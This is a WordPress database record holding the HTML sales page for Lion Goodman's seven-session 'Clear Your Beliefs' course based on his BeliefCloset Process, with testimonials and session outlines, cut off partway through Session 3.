(1033, 2, '2014-06-19 00:59:23', '2014-06-19 05:59:23', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that 